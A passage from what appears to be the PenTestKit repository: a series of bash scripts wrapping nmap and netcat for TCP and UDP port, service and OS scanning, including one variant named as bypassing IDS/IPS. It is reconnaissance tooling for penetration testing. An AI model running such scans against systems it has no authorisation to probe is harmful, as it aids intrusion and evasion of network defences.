16 | #    MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE.  See the
17 | #    GNU General Public License for more details.
18 | #
19 | #    You should have received a copy of the GNU General Public License
20 | #    along with this program.  If not, see <http://www.gnu.org/licenses/>.
21 | #
22 | #    For more see the file 'LICENSE' for copying permission.
23 | 
24 | if [[ $EUID -ne 0 ]]; then
25 |   echo "Please run this script as root." 1>&2
26 |   exit 1
27 | fi
28 | 
29 | if [ $# -eq 1 ]; then
30 |     nmap -sS -n -Pn -vv -p- --reason --open -oA tcp_ports_full_$1 $1
31 | else
32 |     echo "Please provide the target IP address or an IP range."
33 | fi
34 | 


--------------------------------------------------------------------------------
/port-scanning/tcp/full/tcp-ports-scan-full-noping.sh:
--------------------------------------------------------------------------------
 1 | #!/bin/bash
 2 | 
 3 | #    This file is part of PenTestKit
 4 | #    Copyright (C) 2017-2018 @maldevel
 5 | #    https://github.com/maldevel/PenTestKit
 6 | #
 7 | #    PenTestKit - Useful tools for Penetration Testing.
 8 | #
 9 | #    This program is free software: you can redistribute it and/or modify
10 | #    it under the terms of the GNU General Public License as published by
11 | #    the Free Software Foundation, either version 3 of the License, or
12 | #    (at your option) any later version.
13 | #
14 | #    This program is distributed in the hope that it will be useful,
15 | #    but WITHOUT ANY WARRANTY; without even the implied warranty of
16 | #    MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE.  See the
17 | #    GNU General Public License for more details.
18 | #
19 | #    You should have received a copy of the GNU General Public License
20 | #    along with this program.  If not, see <http://www.gnu.org/licenses/>.
21 | #
22 | #    For more see the file 'LICENSE' for copying permission.
23 | 
24 | if [[ $EUID -ne 0 ]]; then
25 |   echo "Please run this script as root." 1>&2
26 |   exit 1
27 | fi
28 | 
29 | if [ $# -eq 1 ]; then
30 |     nmap -sS -vv -p- -Pn --reason --open -oA tcp_ports_full_$1 $1
31 | else
32 |     echo "Please provide the target IP address or an IP range."
33 | fi
34 | 


--------------------------------------------------------------------------------
/port-scanning/tcp/full/tcp-ports-scan-full-super-fast-noping-nodns.sh:
--------------------------------------------------------------------------------
 1 | #!/bin/bash
 2 | 
 3 | #    This file is part of PenTestKit
 4 | #    Copyright (C) 2017-2023 @maldevel
 5 | #    https://github.com/maldevel/PenTestKit
 6 | #
 7 | #    PenTestKit - Useful tools for Penetration Testing.
 8 | #
 9 | #    This program is free software: you can redistribute it and/or modify
10 | #    it under the terms of the GNU General Public License as published by
11 | #    the Free Software Foundation, either version 3 of the License, or
12 | #    (at your option) any later version.
13 | #
14 | #    This program is distributed in the hope that it will be useful,
15 | #    but WITHOUT ANY WARRANTY; without even the implied warranty of
16 | #    MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE.  See the
17 | #    GNU General Public License for more details.
18 | #
19 | #    You should have received a copy of the GNU General Public License
20 | #    along with this program.  If not, see <http://www.gnu.org/licenses/>.
21 | #
22 | #    For more see the file 'LICENSE' for copying permission.
23 | 
24 | if [[ $EUID -ne 0 ]]; then
25 |   echo "Please run this script as root." 1>&2
26 |   exit 1
27 | fi
28 | 
29 | if [ $# -eq 1 ]; then
30 |     nmap -sS -n -Pn -vv -p- --reason --open -T4 --defeat-rst-ratelimit -oA tcp_ports_full_$1 $1
31 | else
32 |     echo "Please provide the target IP address or an IP range."
33 | fi
34 | 


--------------------------------------------------------------------------------
/port-scanning/tcp/full/tcp-ports-scan-full-with-services-noping-nodns-bypass-ids-ips.sh:
--------------------------------------------------------------------------------
 1 | #!/bin/bash
 2 | 
 3 | #    This file is part of PenTestKit
 4 | #    Copyright (C) 2017-2018 @maldevel
 5 | #    https://github.com/maldevel/PenTestKit
 6 | #
 7 | #    PenTestKit - Useful tools for Penetration Testing.
 8 | #
 9 | #    This program is free software: you can redistribute it and/or modify
10 | #    it under the terms of the GNU General Public License as published by
11 | #    the Free Software Foundation, either version 3 of the License, or
12 | #    (at your option) any later version.
13 | #
14 | #    This program is distributed in the hope that it will be useful,
15 | #    but WITHOUT ANY WARRANTY; without even the implied warranty of
16 | #    MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE.  See the
17 | #    GNU General Public License for more details.
18 | #
19 | #    You should have received a copy of the GNU General Public License
20 | #    along with this program.  If not, see <http://www.gnu.org/licenses/>.
21 | #
22 | #    For more see the file 'LICENSE' for copying permission.
23 | 
24 | if [[ $EUID -ne 0 ]]; then
25 |   echo "Please run this script as root." 1>&2
26 |   exit 1
27 | fi
28 | 
29 | if [ $# -eq 1 ]; then
30 |     nmap -sT -n -Pn -sV -vv -p- --reason --open -T2 -oA tcp_ports_full_$1 $1
31 | else
32 |     echo "Please provide the target IP address or an IP range."
33 | fi
34 | 


--------------------------------------------------------------------------------
/port-scanning/tcp/full/tcp-ports-scan-full.sh:
--------------------------------------------------------------------------------
 1 | #!/bin/bash
 2 | 
 3 | #    This file is part of PenTestKit
 4 | #    Copyright (C) 2017-2018 @maldevel
 5 | #    https://github.com/maldevel/PenTestKit
 6 | #
 7 | #    PenTestKit - Useful tools for Penetration Testing.
 8 | #
 9 | #    This program is free software: you can redistribute it and/or modify
10 | #    it under the terms of the GNU General Public License as published by
11 | #    the Free Software Foundation, either version 3 of the License, or
12 | #    (at your option) any later version.
13 | #
14 | #    This program is distributed in the hope that it will be useful,
15 | #    but WITHOUT ANY WARRANTY; without even the implied warranty of
16 | #    MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE.  See the
17 | #    GNU General Public License for more details.
18 | #
19 | #    You should have received a copy of the GNU General Public License
20 | #    along with this program.  If not, see <http://www.gnu.org/licenses/>.
21 | #
22 | #    For more see the file 'LICENSE' for copying permission.
23 | 
24 | if [[ $EUID -ne 0 ]]; then
25 |   echo "Please run this script as root." 1>&2
26 |   exit 1
27 | fi
28 | 
29 | if [ $# -eq 1 ]; then
30 |     nmap -sS -vv -p- --reason --open -oA tcp_ports_full_$1 $1
31 | else
32 |     echo "Please provide the target IP address or an IP range."
33 | fi
34 | 


--------------------------------------------------------------------------------
/port-scanning/tcp/services/tcp-ports-services-scan-top400-noping.sh:
--------------------------------------------------------------------------------
 1 | #!/bin/bash
 2 | 
 3 | #    This file is part of PenTestKit
 4 | #    Copyright (C) 2017-2020 @maldevel
 5 | #    https://github.com/maldevel/PenTestKit
 6 | #
 7 | #    PenTestKit - Useful tools for Penetration Testing.
 8 | #
 9 | #    This program is free software: you can redistribute it and/or modify
10 | #    it under the terms of the GNU General Public License as published by
11 | #    the Free Software Foundation, either version 3 of the License, or
12 | #    (at your option) any later version.
13 | #
14 | #    This program is distributed in the hope that it will be useful,
15 | #    but WITHOUT ANY WARRANTY; without even the implied warranty of
16 | #    MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE.  See the
17 | #    GNU General Public License for more details.
18 | #
19 | #    You should have received a copy of the GNU General Public License
20 | #    along with this program.  If not, see <http://www.gnu.org/licenses/>.
21 | #
22 | #    For more see the file 'LICENSE' for copying permission.
23 | 
24 | 
25 | if [[ $EUID -ne 0 ]]; then
26 |   echo "Please run this script as root." 1>&2
27 |   exit 1
28 | fi
29 | 
30 | if [ $# -eq 1 ]; then
31 | 	nmap -sS -sV -vv -O --osscan-guess --version-all -Pn --top-ports 400 --open -T4 -oA tcp_services_400_$1 $1
32 | else
33 |     echo "Please provide the target IP address or an IP range."
34 | fi
35 | 


--------------------------------------------------------------------------------
/port-scanning/tcp/services/tcp-services-fast-scan-noping.sh:
--------------------------------------------------------------------------------
 1 | #!/bin/bash
 2 | 
 3 | #    This file is part of PenTestKit
 4 | #    Copyright (C) 2017-2023 @maldevel
 5 | #    https://github.com/maldevel/PenTestKit
 6 | #
 7 | #    PenTestKit - Useful tools for Penetration Testing.
 8 | #
 9 | #    This program is free software: you can redistribute it and/or modify
10 | #    it under the terms of the GNU General Public License as published by
11 | #    the Free Software Foundation, either version 3 of the License, or
12 | #    (at your option) any later version.
13 | #
14 | #    This program is distributed in the hope that it will be useful,
15 | #    but WITHOUT ANY WARRANTY; without even the implied warranty of
16 | #    MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE.  See the
17 | #    GNU General Public License for more details.
18 | #
19 | #    You should have received a copy of the GNU General Public License
20 | #    along with this program.  If not, see <http://www.gnu.org/licenses/>.
21 | #
22 | #    For more see the file 'LICENSE' for copying permission.
23 | 
24 | 
25 | if [[ $EUID -ne 0 ]]; then
26 |   echo "Please run this script as root." 1>&2
27 |   exit 1
28 | fi
29 | 
30 | if [ $# -eq 2 ]; then
31 |     nmap -sS -vv -A --osscan-guess --version-all -Pn -p$2 -T4 -oA tcp_services_$1 $1
32 | else
33 |     echo "Please provide the target IP address or an IP range and the open TCP ports separated by comma."
34 | fi
35 | 


--------------------------------------------------------------------------------
/port-scanning/tcp/services/tcp-services-scan-noping.sh:
--------------------------------------------------------------------------------
 1 | #!/bin/bash
 2 | 
 3 | #    This file is part of PenTestKit
 4 | #    Copyright (C) 2017-2021 @maldevel
 5 | #    https://github.com/maldevel/PenTestKit
 6 | #
 7 | #    PenTestKit - Useful tools for Penetration Testing.
 8 | #
 9 | #    This program is free software: you can redistribute it and/or modify
10 | #    it under the terms of the GNU General Public License as published by
11 | #    the Free Software Foundation, either version 3 of the License, or
12 | #    (at your option) any later version.
13 | #
14 | #    This program is distributed in the hope that it will be useful,
15 | #    but WITHOUT ANY WARRANTY; without even the implied warranty of
16 | #    MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE.  See the
17 | #    GNU General Public License for more details.
18 | #
19 | #    You should have received a copy of the GNU General Public License
20 | #    along with this program.  If not, see <http://www.gnu.org/licenses/>.
21 | #
22 | #    For more see the file 'LICENSE' for copying permission.
23 | 
24 | 
25 | if [[ $EUID -ne 0 ]]; then
26 |   echo "Please run this script as root." 1>&2
27 |   exit 1
28 | fi
29 | 
30 | if [ $# -eq 2 ]; then
31 |     nmap -sS -vv -A --osscan-guess --version-all -Pn -p$2 -oA tcp_services_$1 $1
32 | else
33 |     echo "Please provide the target IP address or an IP range and the open TCP ports separated by comma."
34 | fi
35 | 


--------------------------------------------------------------------------------
/port-scanning/tcp/services/tcp-services-scan-top1000-noping.sh:
--------------------------------------------------------------------------------
 1 | #!/bin/bash
 2 | 
 3 | #    This file is part of PenTestKit
 4 | #    Copyright (C) 2017-2020 @maldevel
 5 | #    https://github.com/maldevel/PenTestKit
 6 | #
 7 | #    PenTestKit - Useful tools for Penetration Testing.
 8 | #
 9 | #    This program is free software: you can redistribute it and/or modify
10 | #    it under the terms of the GNU General Public License as published by
11 | #    the Free Software Foundation, either version 3 of the License, or
12 | #    (at your option) any later version.
13 | #
14 | #    This program is distributed in the hope that it will be useful,
15 | #    but WITHOUT ANY WARRANTY; without even the implied warranty of
16 | #    MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE.  See the
17 | #    GNU General Public License for more details.
18 | #
19 | #    You should have received a copy of the GNU General Public License
20 | #    along with this program.  If not, see <http://www.gnu.org/licenses/>.
21 | #
22 | #    For more see the file 'LICENSE' for copying permission.
23 | 
24 | 
25 | if [[ $EUID -ne 0 ]]; then
26 |   echo "Please run this script as root." 1>&2
27 |   exit 1
28 | fi
29 | 
30 | if [ $# -eq 1 ]; then
31 | 	nmap -sS -vv -A --osscan-guess --version-all -Pn --top-ports 1000 --open -oA tcp_services_1000_$1 $1
32 | else
33 |     echo "Please provide the target IP address or an IP range."
34 | fi
35 | 


--------------------------------------------------------------------------------
/port-scanning/tcp/services/tcp-services-super-fast-scan-noping.sh:
--------------------------------------------------------------------------------
 1 | #!/bin/bash
 2 | 
 3 | #    This file is part of PenTestKit
 4 | #    Copyright (C) 2017-2023 @maldevel
 5 | #    https://github.com/maldevel/PenTestKit
 6 | #
 7 | #    PenTestKit - Useful tools for Penetration Testing.
 8 | #
 9 | #    This program is free software: you can redistribute it and/or modify
10 | #    it under the terms of the GNU General Public License as published by
11 | #    the Free Software Foundation, either version 3 of the License, or
12 | #    (at your option) any later version.
13 | #
14 | #    This program is distributed in the hope that it will be useful,
15 | #    but WITHOUT ANY WARRANTY; without even the implied warranty of
16 | #    MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE.  See the
17 | #    GNU General Public License for more details.
18 | #
19 | #    You should have received a copy of the GNU General Public License
20 | #    along with this program.  If not, see <http://www.gnu.org/licenses/>.
21 | #
22 | #    For more see the file 'LICENSE' for copying permission.
23 | 
24 | 
25 | if [[ $EUID -ne 0 ]]; then
26 |   echo "Please run this script as root." 1>&2
27 |   exit 1
28 | fi
29 | 
30 | if [ $# -eq 2 ]; then
31 |     nmap -sS -vv -A --osscan-guess --version-all -Pn -p$2 -T4 --defeat-rst-ratelimit -oA tcp_services_$1 $1
32 | else
33 |     echo "Please provide the target IP address or an IP range and the open TCP ports separated by comma."
34 | fi
35 | 


--------------------------------------------------------------------------------
/port-scanning/tcp/tcp-ports-scan-delay-nc.sh:
--------------------------------------------------------------------------------
 1 | #!/bin/bash
 2 | 
 3 | #    This file is part of PenTestKit
 4 | #    Copyright (C) 2017-2020 @maldevel
 5 | #    https://github.com/maldevel/PenTestKit
 6 | #
 7 | #    PenTestKit - Useful tools for Penetration Testing.
 8 | #
 9 | #    This program is free software: you can redistribute it and/or modify
10 | #    it under the terms of the GNU General Public License as published by
11 | #    the Free Software Foundation, either version 3 of the License, or
12 | #    (at your option) any later version.
13 | #
14 | #    This program is distributed in the hope that it will be useful,
15 | #    but WITHOUT ANY WARRANTY; without even the implied warranty of
16 | #    MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE.  See the
17 | #    GNU General Public License for more details.
18 | #
19 | #    You should have received a copy of the GNU General Public License
20 | #    along with this program.  If not, see <http://www.gnu.org/licenses/>.
21 | #
22 | #    For more see the file 'LICENSE' for copying permission.
23 | 
24 | 
25 | if [ $# -eq 2 ]; then
26 | 	nc -w 1 -z -v $1 $2
27 | else
28 |     echo "Please provide a host and a port range."
29 | fi
30 | 


--------------------------------------------------------------------------------
/port-scanning/tcp/tcp-ports-scan-nc.sh:
--------------------------------------------------------------------------------
 1 | #!/bin/bash
 2 | 
 3 | #    This file is part of PenTestKit
 4 | #    Copyright (C) 2017-2020 @maldevel
 5 | #    https://github.com/maldevel/PenTestKit
 6 | #
 7 | #    PenTestKit - Useful tools for Penetration Testing.
 8 | #
 9 | #    This program is free software: you can redistribute it and/or modify
10 | #    it under the terms of the GNU General Public License as published by
11 | #    the Free Software Foundation, either version 3 of the License, or
12 | #    (at your option) any later version.
13 | #
14 | #    This program is distributed in the hope that it will be useful,
15 | #    but WITHOUT ANY WARRANTY; without even the implied warranty of
16 | #    MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE.  See the
17 | #    GNU General Public License for more details.
18 | #
19 | #    You should have received a copy of the GNU General Public License
20 | #    along with this program.  If not, see <http://www.gnu.org/licenses/>.
21 | #
22 | #    For more see the file 'LICENSE' for copying permission.
23 | 
24 | 
25 | if [ $# -eq 2 ]; then
26 | 	nc -z -n -v $1 $2
27 | else
28 |     echo "Please provide a host and a port range."
29 | fi
30 | 


--------------------------------------------------------------------------------
/port-scanning/tcp/tcp-ports-scan-top1000-fast-noping-nodns.sh:
--------------------------------------------------------------------------------
 1 | #!/bin/bash
 2 | 
 3 | #    This file is part of PenTestKit
 4 | #    Copyright (C) 2017-2022 @maldevel
 5 | #    https://github.com/maldevel/PenTestKit
 6 | #
 7 | #    PenTestKit - Useful tools for Penetration Testing.
 8 | #
 9 | #    This program is free software: you can redistribute it and/or modify
10 | #    it under the terms of the GNU General Public License as published by
11 | #    the Free Software Foundation, either version 3 of the License, or
12 | #    (at your option) any later version.
13 | #
14 | #    This program is distributed in the hope that it will be useful,
15 | #    but WITHOUT ANY WARRANTY; without even the implied warranty of
16 | #    MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE.  See the
17 | #    GNU General Public License for more details.
18 | #
19 | #    You should have received a copy of the GNU General Public License
20 | #    along with this program.  If not, see <http://www.gnu.org/licenses/>.
21 | #
22 | #    For more see the file 'LICENSE' for copying permission.
23 | 
24 | 
25 | if [[ $EUID -ne 0 ]]; then
26 |   echo "Please run this script as root." 1>&2
27 |   exit 1
28 | fi
29 | 
30 | if [ $# -eq 1 ]; then
31 | 	nmap -sS -n -Pn -vv --top-ports 1000 --open --reason -T4 -oA tcp_ports_1000_$1 $1
32 | else
33 |     echo "Please provide the target IP address or an IP range."
34 | fi
35 | 


--------------------------------------------------------------------------------
/port-scanning/tcp/tcp-ports-scan-top1000-maxrate-noping.sh:
--------------------------------------------------------------------------------
 1 | #!/bin/bash
 2 | 
 3 | #    This file is part of PenTestKit
 4 | #    Copyright (C) 2017-2020 @maldevel
 5 | #    https://github.com/maldevel/PenTestKit
 6 | #
 7 | #    PenTestKit - Useful tools for Penetration Testing.
 8 | #
 9 | #    This program is free software: you can redistribute it and/or modify
10 | #    it under the terms of the GNU General Public License as published by
11 | #    the Free Software Foundation, either version 3 of the License, or
12 | #    (at your option) any later version.
13 | #
14 | #    This program is distributed in the hope that it will be useful,
15 | #    but WITHOUT ANY WARRANTY; without even the implied warranty of
16 | #    MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE.  See the
17 | #    GNU General Public License for more details.
18 | #
19 | #    You should have received a copy of the GNU General Public License
20 | #    along with this program.  If not, see <http://www.gnu.org/licenses/>.
21 | #
22 | #    For more see the file 'LICENSE' for copying permission.
23 | 
24 | 
25 | if [[ $EUID -ne 0 ]]; then
26 |   echo "Please run this script as root." 1>&2
27 |   exit 1
28 | fi
29 | 
30 | if [ $# -eq 2 ]; then
31 | 	nmap -sS -vv --top-ports 1000 --reason --open --max-rate $2 -oA tcp_ports_1000_maxrate_$1 $1
32 | else
33 |     echo "Please provide the target IP address or an IP range and the max rate."
34 | fi
35 | 


--------------------------------------------------------------------------------
/port-scanning/tcp/tcp-ports-scan-top1000-maxrate.sh:
--------------------------------------------------------------------------------
 1 | #!/bin/bash
 2 | 
 3 | #    This file is part of PenTestKit
 4 | #    Copyright (C) 2017-2020 @maldevel
 5 | #    https://github.com/maldevel/PenTestKit
 6 | #
 7 | #    PenTestKit - Useful tools for Penetration Testing.
 8 | #
 9 | #    This program is free software: you can redistribute it and/or modify
10 | #    it under the terms of the GNU General Public License as published by
11 | #    the Free Software Foundation, either version 3 of the License, or
12 | #    (at your option) any later version.
13 | #
14 | #    This program is distributed in the hope that it will be useful,
15 | #    but WITHOUT ANY WARRANTY; without even the implied warranty of
16 | #    MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE.  See the
17 | #    GNU General Public License for more details.
18 | #
19 | #    You should have received a copy of the GNU General Public License
20 | #    along with this program.  If not, see <http://www.gnu.org/licenses/>.
21 | #
22 | #    For more see the file 'LICENSE' for copying permission.
23 | 
24 | 
25 | if [[ $EUID -ne 0 ]]; then
26 |   echo "Please run this script as root." 1>&2
27 |   exit 1
28 | fi
29 | 
30 | if [ $# -eq 2 ]; then
31 | 	nmap -sS -vv --top-ports 1000 -Pn --reason --open --max-rate $2 -oA tcp_ports_1000_maxrate_$1 $1
32 | else
33 |     echo "Please provide the target IP address or an IP range and the max rate."
34 | fi
35 | 


--------------------------------------------------------------------------------
/port-scanning/tcp/tcp-ports-scan-top1000-noping-nodns.sh:
--------------------------------------------------------------------------------
 1 | #!/bin/bash
 2 | 
 3 | #    This file is part of PenTestKit
 4 | #    Copyright (C) 2017-2020 @maldevel
 5 | #    https://github.com/maldevel/PenTestKit
 6 | #
 7 | #    PenTestKit - Useful tools for Penetration Testing.
 8 | #
 9 | #    This program is free software: you can redistribute it and/or modify
10 | #    it under the terms of the GNU General Public License as published by
11 | #    the Free Software Foundation, either version 3 of the License, or
12 | #    (at your option) any later version.
13 | #
14 | #    This program is distributed in the hope that it will be useful,
15 | #    but WITHOUT ANY WARRANTY; without even the implied warranty of
16 | #    MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE.  See the
17 | #    GNU General Public License for more details.
18 | #
19 | #    You should have received a copy of the GNU General Public License
20 | #    along with this program.  If not, see <http://www.gnu.org/licenses/>.
21 | #
22 | #    For more see the file 'LICENSE' for copying permission.
23 | 
24 | 
25 | if [[ $EUID -ne 0 ]]; then
26 |   echo "Please run this script as root." 1>&2
27 |   exit 1
28 | fi
29 | 
30 | if [ $# -eq 1 ]; then
31 | 	nmap -sS -n -Pn -vv --top-ports 1000 --reason --open -oA tcp_ports_1000_$1 $1
32 | else
33 |     echo "Please provide the target IP address or an IP range."
34 | fi
35 | 


--------------------------------------------------------------------------------
/port-scanning/tcp/tcp-ports-scan-top1000-noping.sh:
--------------------------------------------------------------------------------
 1 | #!/bin/bash
 2 | 
 3 | #    This file is part of PenTestKit
 4 | #    Copyright (C) 2017-2020 @maldevel
 5 | #    https://github.com/maldevel/PenTestKit
 6 | #
 7 | #    PenTestKit - Useful tools for Penetration Testing.
 8 | #
 9 | #    This program is free software: you can redistribute it and/or modify
10 | #    it under the terms of the GNU General Public License as published by
11 | #    the Free Software Foundation, either version 3 of the License, or
12 | #    (at your option) any later version.
13 | #
14 | #    This program is distributed in the hope that it will be useful,
15 | #    but WITHOUT ANY WARRANTY; without even the implied warranty of
16 | #    MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE.  See the
17 | #    GNU General Public License for more details.
18 | #
19 | #    You should have received a copy of the GNU General Public License
20 | #    along with this program.  If not, see <http://www.gnu.org/licenses/>.
21 | #
22 | #    For more see the file 'LICENSE' for copying permission.
23 | 
24 | 
25 | if [[ $EUID -ne 0 ]]; then
26 |   echo "Please run this script as root." 1>&2
27 |   exit 1
28 | fi
29 | 
30 | if [ $# -eq 1 ]; then
31 | 	nmap -sS -vv --top-ports 1000 -Pn --reason --open -oA tcp_ports_1000_$1 $1
32 | else
33 |     echo "Please provide the target IP address or an IP range."
34 | fi
35 | 


--------------------------------------------------------------------------------
/port-scanning/tcp/tcp-ports-scan-top1000-slow-noping-nodns.sh:
--------------------------------------------------------------------------------
 1 | #!/bin/bash
 2 | 
 3 | #    This file is part of PenTestKit
 4 | #    Copyright (C) 2017-2020 @maldevel
 5 | #    https://github.com/maldevel/PenTestKit
 6 | #
 7 | #    PenTestKit - Useful tools for Penetration Testing.
 8 | #
 9 | #    This program is free software: you can redistribute it and/or modify
10 | #    it under the terms of the GNU General Public License as published by
11 | #    the Free Software Foundation, either version 3 of the License, or
12 | #    (at your option) any later version.
13 | #
14 | #    This program is distributed in the hope that it will be useful,
15 | #    but WITHOUT ANY WARRANTY; without even the implied warranty of
16 | #    MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE.  See the
17 | #    GNU General Public License for more details.
18 | #
19 | #    You should have received a copy of the GNU General Public License
20 | #    along with this program.  If not, see <http://www.gnu.org/licenses/>.
21 | #
22 | #    For more see the file 'LICENSE' for copying permission.
23 | 
24 | 
25 | if [[ $EUID -ne 0 ]]; then
26 |   echo "Please run this script as root." 1>&2
27 |   exit 1
28 | fi
29 | 
30 | if [ $# -eq 1 ]; then
31 | 	nmap -sS -n -Pn -vv --top-ports 1000 --reason --open --host-timeout 30m --scan-delay 1s -oA tcp_ports_1000_$1 $1
32 | else
33 |     echo "Please provide the target IP address or an IP range."
34 | fi
35 | 


--------------------------------------------------------------------------------
/port-scanning/tcp/tcp-ports-scan-top1000-suprt-fast-noping-nodns.sh:
--------------------------------------------------------------------------------
 1 | #!/bin/bash
 2 | 
 3 | #    This file is part of PenTestKit
 4 | #    Copyright (C) 2017-2023 @maldevel
 5 | #    https://github.com/maldevel/PenTestKit
 6 | #
 7 | #    PenTestKit - Useful tools for Penetration Testing.
 8 | #
 9 | #    This program is free software: you can redistribute it and/or modify
10 | #    it under the terms of the GNU General Public License as published by
11 | #    the Free Software Foundation, either version 3 of the License, or
12 | #    (at your option) any later version.
13 | #
14 | #    This program is distributed in the hope that it will be useful,
15 | #    but WITHOUT ANY WARRANTY; without even the implied warranty of
16 | #    MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE.  See the
17 | #    GNU General Public License for more details.
18 | #
19 | #    You should have received a copy of the GNU General Public License
20 | #    along with this program.  If not, see <http://www.gnu.org/licenses/>.
21 | #
22 | #    For more see the file 'LICENSE' for copying permission.
23 | 
24 | 
25 | if [[ $EUID -ne 0 ]]; then
26 |   echo "Please run this script as root." 1>&2
27 |   exit 1
28 | fi
29 | 
30 | if [ $# -eq 1 ]; then
31 | 	nmap -sS -n -Pn -vv --top-ports 1000 --open --reason -T4 --defeat-rst-ratelimit -oA tcp_ports_1000_$1 $1
32 | else
33 |     echo "Please provide the target IP address or an IP range."
34 | fi
35 | 


--------------------------------------------------------------------------------
/port-scanning/tcp/tcp-ports-scan-top1000.sh:
--------------------------------------------------------------------------------
 1 | #!/bin/bash
 2 | 
 3 | #    This file is part of PenTestKit
 4 | #    Copyright (C) 2017-2020 @maldevel
 5 | #    https://github.com/maldevel/PenTestKit
 6 | #
 7 | #    PenTestKit - Useful tools for Penetration Testing.
 8 | #
 9 | #    This program is free software: you can redistribute it and/or modify
10 | #    it under the terms of the GNU General Public License as published by
11 | #    the Free Software Foundation, either version 3 of the License, or
12 | #    (at your option) any later version.
13 | #
14 | #    This program is distributed in the hope that it will be useful,
15 | #    but WITHOUT ANY WARRANTY; without even the implied warranty of
16 | #    MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE.  See the
17 | #    GNU General Public License for more details.
18 | #
19 | #    You should have received a copy of the GNU General Public License
20 | #    along with this program.  If not, see <http://www.gnu.org/licenses/>.
21 | #
22 | #    For more see the file 'LICENSE' for copying permission.
23 | 
24 | 
25 | if [[ $EUID -ne 0 ]]; then
26 |   echo "Please run this script as root." 1>&2
27 |   exit 1
28 | fi
29 | 
30 | if [ $# -eq 1 ]; then
31 | 	nmap -sS -vv --top-ports 1000 --open -oA tcp_ports_1000_$1 $1
32 | else
33 |     echo "Please provide the target IP address or an IP range."
34 | fi
35 | 


--------------------------------------------------------------------------------
/port-scanning/tcp/tcp-ports-scan-top2000-noping-nodns.sh:
--------------------------------------------------------------------------------
 1 | #!/bin/bash
 2 | 
 3 | #    This file is part of PenTestKit
 4 | #    Copyright (C) 2017-2020 @maldevel
 5 | #    https://github.com/maldevel/PenTestKit
 6 | #
 7 | #    PenTestKit - Useful tools for Penetration Testing.
 8 | #
 9 | #    This program is free software: you can redistribute it and/or modify
10 | #    it under the terms of the GNU General Public License as published by
11 | #    the Free Software Foundation, either version 3 of the License, or
12 | #    (at your option) any later version.
13 | #
14 | #    This program is distributed in the hope that it will be useful,
15 | #    but WITHOUT ANY WARRANTY; without even the implied warranty of
16 | #    MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE.  See the
17 | #    GNU General Public License for more details.
18 | #
19 | #    You should have received a copy of the GNU General Public License
20 | #    along with this program.  If not, see <http://www.gnu.org/licenses/>.
21 | #
22 | #    For more see the file 'LICENSE' for copying permission.
23 | 
24 | 
25 | if [[ $EUID -ne 0 ]]; then
26 |   echo "Please run this script as root." 1>&2
27 |   exit 1
28 | fi
29 | 
30 | if [ $# -eq 1 ]; then
31 | 	nmap -sS -n -Pn -vv --top-ports 2000 --reason --open -oA tcp_ports_2000_$1 $1
32 | else
33 |     echo "Please provide the target IP address or an IP range."
34 | fi
35 | 


--------------------------------------------------------------------------------
/port-scanning/tcp/tcp-scan-web-server.sh:
--------------------------------------------------------------------------------
 1 | #!/bin/bash
 2 | 
 3 | #    This file is part of PenTestKit
 4 | #    Copyright (C) 2017-2020 @maldevel
 5 | #    https://github.com/maldevel/PenTestKit
 6 | #
 7 | #    PenTestKit - Useful tools for Penetration Testing.
 8 | #
 9 | #    This program is free software: you can redistribute it and/or modify
10 | #    it under the terms of the GNU General Public License as published by
11 | #    the Free Software Foundation, either version 3 of the License, or
12 | #    (at your option) any later version.
13 | #
14 | #    This program is distributed in the hope that it will be useful,
15 | #    but WITHOUT ANY WARRANTY; without even the implied warranty of
16 | #    MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE.  See the
17 | #    GNU General Public License for more details.
18 | #
19 | #    You should have received a copy of the GNU General Public License
20 | #    along with this program.  If not, see <http://www.gnu.org/licenses/>.
21 | #
22 | #    For more see the file 'LICENSE' for copying permission.
23 | 
24 | 
25 | if [[ $EUID -ne 0 ]]; then
26 |   echo "Please run this script as root." 1>&2
27 |   exit 1
28 | fi
29 | 
30 | if [ $# -eq 1 ]; then
31 | 	nmap -sS -vv -A --osscan-guess --version-all -Pn -p80,81,443,1080,3000,4000,5000,5601,6379,8000,8008,8080,8081,8181,8443,8888,9000,9080,9090,9200,9443,10000,15672 -oA tcp_web_server_$1 $1
32 | else
33 |     echo "Please provide the web server."
34 | fi
35 | 


--------------------------------------------------------------------------------
/port-scanning/udp/full/udp-ports-scan-full-fast-noping-nodns.sh:
--------------------------------------------------------------------------------
 1 | #!/bin/bash
 2 | 
 3 | #    This file is part of PenTestKit
 4 | #    Copyright (C) 2017-2018 @maldevel
 5 | #    https://github.com/maldevel/PenTestKit
 6 | #
 7 | #    PenTestKit - Useful tools for Penetration Testing.
 8 | #
 9 | #    This program is free software: you can redistribute it and/or modify
10 | #    it under the terms of the GNU General Public License as published by
11 | #    the Free Software Foundation, either version 3 of the License, or
12 | #    (at your option) any later version.
13 | #
14 | #    This program is distributed in the hope that it will be useful,
15 | #    but WITHOUT ANY WARRANTY; without even the implied warranty of
16 | #    MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE.  See the
17 | #    GNU General Public License for more details.
18 | #
19 | #    You should have received a copy of the GNU General Public License
20 | #    along with this program.  If not, see <http://www.gnu.org/licenses/>.
21 | #
22 | #    For more see the file 'LICENSE' for copying permission.
23 | 
24 | 
25 | if [[ $EUID -ne 0 ]]; then
26 |   echo "Please run this script as root." 1>&2
